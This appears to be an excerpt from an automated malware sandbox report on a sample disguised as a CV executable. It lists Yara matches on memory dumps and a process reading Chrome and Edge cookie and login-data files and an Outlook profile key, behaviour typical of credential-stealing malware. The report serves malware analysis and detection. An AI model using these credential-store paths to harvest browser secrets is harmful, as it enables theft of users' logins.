Source: Yara match	File source: 00000002.00000002.1457438353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3658674267.0000000003480000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3665046974.00000000048F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3662944861.0000000004E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3657466018.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1459154555.0000000001850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1459314243.00000000037F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Windows\SysWOW64\TSTheme.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies			Jump to behavior
Source: C:\Windows\SysWOW64\TSTheme.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data			Jump to behavior
Source: C:\Windows\SysWOW64\TSTheme.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Windows\SysWOW64\TSTheme.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State			Jump to behavior
Source: C:\Windows\SysWOW64\TSTheme.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State			Jump to behavior
Source: C:\Windows\SysWOW64\TSTheme.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data			Jump to behavior
Source: C:\Windows\SysWOW64\TSTheme.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies			Jump to behavior
Source: C:\Windows\SysWOW64\TSTheme.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies			Jump to behavior

Source: C:\Windows\SysWOW64\TSTheme.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Remote Access Functionality

Source: Yara match	File source: 2.2.Curriculum Vitae Catalina Munoz.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Curriculum Vitae Catalina Munoz.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.1457438353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3658674267.0000000003480000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3665046974.00000000048F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3662944861.0000000004E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3657466018.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1459154555.0000000001850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1459314243.00000000037F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY